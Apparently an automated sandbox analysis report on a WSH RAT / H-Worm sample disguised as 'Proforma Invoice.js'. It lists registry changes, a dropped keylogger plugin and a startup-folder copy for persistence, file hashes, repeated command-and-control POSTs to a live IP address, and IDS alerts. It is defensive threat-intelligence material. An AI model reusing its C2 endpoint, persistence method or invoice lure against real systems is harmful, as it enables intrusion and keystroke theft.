HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
MaxFileSize
1048576
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
FileDirectory
%windir%\tracing
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
EnableFileTracing
0
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
EnableConsoleTracing
0
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
FileTracingMask
4294901760
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
ConsoleTracingMask
4294901760
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
MaxFileSize
1048576
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
FileDirectory
%windir%\tracing
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
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
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1

Files activity

Executable files
1
Suspicious files
0
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
952
wscript.exe
C:\Users\admin\AppData\Roaming\kl-plugin.exe
executable
MD5: 7099a939fa30d939ccceb2f0597b19ed
SHA256: 272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a
1856
WScript.exe
C:\Users\admin\AppData\Roaming\Proforma Invoice.js
text
MD5: e11c4858c73a9f7fc1e62d56997c596b
SHA256: 22d987eb8983590955a24c3458dfd18f192bb1dbd91e82f99a5da47d7248c866
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\lj1fg2om.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\hvw-sfbr.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\vkdxty4d.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\skcan_lm.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\4bht5o7p.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\9hjza_5h.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\qd7a4hu0.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\-zdje6c4.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\7zslasgf.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\y595xfbd.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\3kiyld_d.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\bviiobgn.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\ttpkiy1v.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\-mjpw8iy.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\f-3x_yzf.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\gifwabcm.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\mfqztup4.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\buv5pfyw.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\_wehvz4b.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\xs-rqgoj.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\h_henj_l.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\avvkkhq5.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\sie7ezxx.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\vpurskcv.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\j8o2h-lc.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\ejvk-tsv.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\va-lngrh.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\kxjyfy0s.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\smup9a_n.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\hkapfudc.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\usvvh8zp.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\uqq0de2-.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\brkvqeg4.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\tjkswubp.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\in_jkzyd.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\user.config xml MD5: 6adab4c76fc078ab342c1543663b25b8 SHA256: 367d9883f14feff7473dd6936c4378e25c1829de2d5e835e767185b8637e5d3a
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\5xe2ccne.newcfg –– MD5: –– SHA256: ––
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\kbfsdbuk.newcfg –– MD5: –– SHA256: ––
952 wscript.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\json[1] text MD5: 8d4c7a62ea10405837c345cf422df59e SHA256: cf8aefe858deb2365484a096a6f5bd60c98c7e3c7857e8a288892d971ed52877
952 wscript.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Proforma Invoice.js text MD5: e11c4858c73a9f7fc1e62d56997c596b SHA256: 22d987eb8983590955a24c3458dfd18f192bb1dbd91e82f99a5da47d7248c866
1856 WScript.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Proforma Invoice.js text MD5: e11c4858c73a9f7fc1e62d56997c596b SHA256: 22d987eb8983590955a24c3458dfd18f192bb1dbd91e82f99a5da47d7248c866
2236 kl-plugin.exe C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\w1t8c_da.newcfg –– MD5: –– SHA256: ––

Find more information about the static content and download it at the full report

Network activity

HTTP(S) requests
13
TCP/UDP connections
15
DNS requests
3
Threats
39

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
952 wscript.exe GET 200 208.95.112.1:80 http://ip-api.com/json/ unknown text shared
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH –– –– malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
952 wscript.exe 208.95.112.1:80 IBURST –– malicious
952 wscript.exe 79.134.225.103:7775 Andreas Fink trading as Fink Telecom Services CH malicious

DNS requests

Domain IP Reputation
ip-api.com 208.95.112.1 shared
dns.msftncsi.com 131.107.255.255 whitelisted

Threats

PID Process Class Message
952 wscript.exe Potential Corporate Privacy Violation ET POLICY External IP Lookup ip-api.com
952 wscript.exe Potential Corporate Privacy Violation AV POLICY Internal Host Retrieving External IP Address (ip-api.com)
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm

Debug output strings

Process Message
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0